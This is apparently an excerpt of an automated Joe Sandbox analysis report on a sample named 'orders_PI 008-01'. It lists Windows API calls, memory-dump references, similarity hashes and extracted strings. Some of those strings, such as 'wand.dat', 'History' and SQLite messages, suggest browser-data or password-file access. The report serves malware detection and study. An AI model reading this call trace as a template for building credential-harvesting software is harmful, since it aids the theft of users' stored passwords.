                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                        • malloc.MSVCRT ref: 004174BD
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                        • free.MSVCRT ref: 004174E4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                        • String ID:
                                        • API String ID: 4053608372-0
                                        • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                        • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                        • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                        • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                        APIs
                                        • GetParent.USER32(?), ref: 0040D453
                                        • GetWindowRect.USER32(?,?), ref: 0040D460
                                        • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                        • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                        • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                        • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                        APIs
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                        • memset.MSVCRT ref: 004450CD
                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                        • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                        • String ID:
                                        • API String ID: 1471605966-0
                                        APIs
                                        • wcscpy.MSVCRT ref: 0044475F
                                        • wcscat.MSVCRT ref: 0044476E
                                        • wcscat.MSVCRT ref: 0044477F
                                        • wcscat.MSVCRT ref: 0044478E
                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                          • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                          • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                        • String ID: \StringFileInfo\
                                        • API String ID: 102104167-2245444037
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        APIs
                                        • GetSystemMetrics.USER32(00000000), ref: 00401990
                                        • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                        • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$PlacementWindow
                                        • String ID: AE
                                        • API String ID: 3548547718-685266089
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _memicmpwcslen
                                        • String ID: @@@@$History
                                        • API String ID: 1872909662-685208920
                                        APIs
                                        • memset.MSVCRT ref: 004100FB
                                        • memset.MSVCRT ref: 00410112
                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                        • _snwprintf.MSVCRT ref: 00410141
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                        • String ID: </%s>
                                        • API String ID: 3400436232-259020660
                                        APIs
                                        • memset.MSVCRT ref: 0040E770
                                        • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSendmemset
                                        • String ID: AE$"
                                        • API String ID: 568519121-1989281832
                                        APIs
                                        • memset.MSVCRT ref: 0040D58D
                                        • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                        • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ChildEnumTextWindowWindowsmemset
                                        • String ID: caption
                                        • API String ID: 1523050162-4135340389
                                        APIs
                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                        • String ID: MS Sans Serif
                                        • API String ID: 210187428-168460110
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClassName_wcsicmpmemset
                                        • String ID: edit
                                        • API String ID: 2747424523-2167791130
                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                        • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 3150196962-1506664499
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memcmp
                                        • String ID:
                                        • API String ID: 3384217055-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        APIs
                                          • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                          • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                          • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                        • GetMenu.USER32(?), ref: 00410F8D
                                        • GetSubMenu.USER32(00000000), ref: 00410F9A
                                        • GetSubMenu.USER32(00000000), ref: 00410F9D
                                        • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                        • String ID:
                                        • API String ID: 1889144086-0
                                        APIs
                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                        • GetLastError.KERNEL32 ref: 0041810A
                                        • CloseHandle.KERNEL32(00000000), ref: 00418120
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                        • String ID:
                                        • API String ID: 1661045500-0
                                        APIs
                                          • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                        • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                        Strings
                                        • virtual tables may not be altered, xrefs: 0042EBD2
                                        • Cannot add a column to a view, xrefs: 0042EBE8
                                        • sqlite_altertab_%s, xrefs: 0042EC4C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                        • API String ID: 1297977491-2063813899
                                        • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                        • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                        • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                        • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                        APIs
                                        • memset.MSVCRT ref: 0040560C
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                          • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.*$dat$wand.dat
                                        • API String ID: 2618321458-1828844352
                                        • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                        • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                        • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                        • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                        APIs
                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                        • wcslen.MSVCRT ref: 00410C74
                                        • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                        • _wcsicmp.MSVCRT ref: 00410CCE
                                        • _wcsicmp.MSVCRT ref: 00410CDF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                        • String ID:
                                        • API String ID: 1549203181-0
                                        • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                        • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                        • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                        • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                        APIs
                                        • memset.MSVCRT ref: 00412057
                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                        • String ID:
                                        • API String ID: 3550944819-0
                                        • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                        • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                        • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                        • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                        APIs
                                        • free.MSVCRT ref: 0040F561
                                        • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                        • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$free
                                        • String ID: g4@
                                        • API String ID: 2888793982-2133833424
                                        • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                        • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                        • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                        • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                        APIs
                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                        • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
